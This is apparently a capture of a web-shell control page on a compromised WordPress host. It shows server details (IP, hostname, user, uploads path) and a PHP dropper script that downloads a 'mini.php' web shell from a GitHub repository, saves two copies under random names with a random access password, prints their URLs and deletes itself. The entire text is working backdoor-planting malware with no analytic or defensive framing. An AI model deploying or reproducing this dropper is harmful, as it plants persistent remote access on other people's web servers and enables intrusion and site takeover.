| Server IP : 66.29.132.124 / Your IP : 18.224.43.98 Web Server : LiteSpeed System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : wavevlvu ( 1524) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wavevlvu/misswavenigeria.com/wp-content/uploads/ |
Upload File : |
<?php
# 383634
$shell=curl('https://raw.githubusercontent.com/CasperSecurity/Webshells/main/mini.php');
$link = str_replace(basename(__FILE__),'','http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
$file1=mt_rand_str(6).".php";
$file2=mt_rand_str(5).".php";
$password=mt_rand_str(4);
$save=fopen($file1,'w');fwrite($save,$shell);fclose($save);$uploader=curl('https://raw.githubusercontent.com/CasperSecurity/Webshells/main/mini.php'); $uploader=str_replace('Casper',$password,$uploader); $save=fopen($file2,'w');fwrite($save,$uploader);fclose($save);
function mt_rand_str ($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
for ($s = '', $cl = strlen($c)-1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
return $s;
}
function curl($url) { $html=file_get_contents($url); if(!empty($html)){ return $html;}
$curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); }
?>
<shell><font color="red"><center> Shell : <?php echo $link.$file1;?></center></font><br></shell><up><font color="green"><center> Up : <?php echo $link.$file2.'?Casper='.$password;?></center></font><br></up><?php unlink(__FILE__); ?>